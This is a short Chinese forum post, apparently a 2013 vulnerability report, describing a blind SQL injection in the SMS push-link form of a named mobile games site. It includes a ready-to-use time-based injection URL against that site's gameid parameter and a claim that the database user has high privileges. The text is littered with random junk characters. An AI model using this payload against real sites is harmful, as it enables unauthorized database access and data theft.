简要描述:- {9 I8 _& b8 s7 u
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
) B+ k8 A S0 i: o/ T4 P- |$ q* P' R8 v9 X6 w
详细说明:
9 l H8 P/ Y8 c1 L. P存在SQL盲注url:. a E& S3 R- G, K/ _; \2 j$ A
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1) }* F# y+ @/ j c
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png0 ]5 w& {. F2 Q" w8 t$ k3 C
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
, f9 G: z( u' D @% _http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
' M+ o1 A: B; l- n. E; P
7 i5 J$ v( b9 t( [: U+ W1 c; D& b u能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对